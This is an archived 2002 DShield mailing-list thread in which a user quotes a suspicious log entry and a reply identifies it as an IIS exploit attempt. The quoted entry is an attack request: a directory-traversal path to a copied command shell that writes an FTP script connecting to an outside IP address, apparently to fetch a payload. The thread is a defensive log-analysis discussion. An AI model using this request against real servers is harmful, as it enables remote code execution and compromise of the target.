[Dshield] Any ideas...

Brenna Primrose drxlecter at phreaker.net
Fri Jun 14 00:03:40 GMT 2002


Looks like a script kiddie testing to see if they can exploit an IIS
FTP.

AIM - abosolut x psycho
Yahoo! - absolut_contagion
ICQ - 1363187
MSN - r00t at creighton.edu
http://gsa.creighton.edu
http://profiles.yahoo.com/absolut_contagion
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
G e* h- r++ x+ 
------END GEEK CODE BLOCK------

-----Original Message-----
From: list-admin at dshield.org [mailto:list-admin at dshield.org] On Behalf
Of Richard Golodner
Sent: Thursday, June 13, 2002 10:35 AM
To: 'list at dshield.org'
Subject: [Dshield] Any ideas...

> Do any of you know what this might be ? It has started to show up in
my
> logs and I am no exploit expert. Any suggestions or wild guesses are
> appreciated. 
> 					Thanks, Rich
> 
> 
> 	GET, /scripts/..%5c..%5ctemp/_/_tmp/cnd.exe,
>
/echo.open%20206.45.20.139>c:\temp\_\_tmp\f.txt&echo.anonymous%20e at mail.
co
> m>>c:\temp\_\_tmp\f.txt&c+echo.binary>>c:\temp\_\_tmp\f.txt, 

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list





More information about the list mailing list